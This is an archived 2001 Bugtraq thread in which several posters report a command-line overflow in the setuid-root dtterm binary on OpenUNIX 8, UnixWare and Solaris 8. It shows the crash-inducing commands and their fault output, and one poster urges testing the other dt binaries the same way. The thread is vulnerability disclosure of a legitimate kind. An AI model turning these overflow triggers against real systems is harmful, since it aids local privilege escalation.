[22781] in bugtraq
Re: OpenUNIX 8 & Unixware possible local root
daemon@ATHENA.MIT.EDU (KF)
Wed Oct 3 16:30:31 2001
Message-ID: <3BBB444C.CA9A228D@snosoft.com>
Date: Wed, 03 Oct 2001 13:01:00 -0400
From: KF <dotslash@snosoft.com>
MIME-Version: 1.0
To: "Cushing, David" <David.Cushing@hitachisoftware.com>,
bugtraq@securityfocus.com
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
You guys should check ALL the dt suid / sgid against command line
HOME and TERM overflows ... as stated prior I have made ALL dt binarys
that
are sgid / suid core on OpenUnix8 except dtmail which already had issues
I believe.
-KF
"Cushing, David" wrote:
>
> I was able to reproduce this on a Solaris 8 sparc machine with different
> tolerances:
>
> [288] uname -a
> SunOS hostname 5.8 Generic_108528-08 sun4u sparc SUNW,Ultra-60
> [289] /usr/dt/bin/dtterm -tn `perl -e 'print "A"x1083'`
> Segmentation Fault(coredump)
> [297] /usr/dt/bin/dtterm -tn `perl -e 'print "A"x2083'`
> Bus Error(coredump)
> ginger:dcushing[298]
>
> -David
>
> > -----Original Message-----
> > From: Aycan Irican [mailto:aycan@mars.prosoft.com.tr]
> > Sent: Tuesday, October 02, 2001 1:55 AM
> > To: bugtraq@securityfocus.com
> > Cc: evrim@envy.com.tr
> > Subject: OpenUNIX 8 & Unixware possible local root
> >
> >
> > -----BEGIN PGP SIGNED MESSAGE-----
> > Hash: SHA1
> >
> > Another dt series bug...
> >
> > $ uname -a
> > OpenUNIX zen 5 8.0.0 i386 x86at Caldera UNIX_SVR5
> > $ id
> > uid=101(fixxxer) gid=1(other)
> > $ ls -al /usr/dt/bin/dtterm
> > - -r-sr-xr-x 1 root bin 60892 Haz 10 05:03
> > /usr/dt/bin/dtterm
> > $ /usr/dt/bin/dtterm -tn `perl -e 'print "A"x1040'`
> > Warning: Missing charsets in String to FontSet conversion
> > Warning: Missing charsets in String to FontSet conversion
> > Memory fault
> > .. snip ..
